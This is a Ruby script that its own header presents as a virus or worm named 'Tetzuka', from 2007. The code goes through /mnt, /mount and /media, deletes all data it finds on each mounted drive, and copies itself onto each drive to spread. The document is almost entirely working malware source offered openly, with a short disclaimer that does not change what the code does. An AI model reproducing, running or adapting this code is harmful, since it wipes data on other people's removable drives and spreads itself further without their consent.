#!/usr/bin/env ruby # VIRUS - BE AWARE - VIRUS # # Name: Tetzuka # Author: SkyOut # Date: September 2007 # Website: http://wired-security.net/ # # Description: This is a Virus (or Worm), that # spreads by copying itself to all connected # (flash)drives. It does this by checking the # directories /mnt, /mount and /media (especially # Ubuntu based systems) and copying itself to the # directories stored in there. These are normally # the ones, where the external drives are connected # to. If there is nothing in those directories it will # copy there anyway, if there is some data in the # directories (normally, when a (flash)drive is connected) # it will recursively delete ALL data. # # WARNING: This virus has only been tested under # special and limited conditions. Do not execute # it on a working machine or a machine, that does # not belong to you. You are responsible for all # actions you take, the author nor the hoster of the # site is responsible. # # VIRUS - BE AWARE - VIRUS require 'fileutils' $mount_dirs = Array.new $mount_dirs = [ "/mnt", "/mount", "/media" ] for $mount_dir in $mount_dirs do if File.directory?($mount_dir) then if File.writable?($mount_dir) then Dir.open($mount_dir).each do |$dir| next if $dir == "." || $dir == ".." $dir2 = $mount_dir + "/" + $dir if File.directory?($dir2) then if File.writable?($dir2) then Dir.open($dir2).each do |$file| next if $file == "." || $file == ".." $file2 = $dir2 + "/" + $file if File.directory?($file2) then FileUtils.remove_dir($file2, true) end if File.file?($file2) then File.delete($file2) end end end end end end end end for $mount_dir in $mount_dirs do if File.directory?($mount_dir) then if File.writable?($mount_dir) then Dir.open($mount_dir).each do |$dir| next if $dir == "." || $dir == ".." $dir2 = $mount_dir + "/" + $dir $virus = File.open("tetzuka.rb", "r") $virus2 = File.open("#{$dir2}/tetzuka.rb", "w") $blksize = $virus.stat.blksize while ($line = $virus.read($blksize)) $virus2.write($line) end end end end end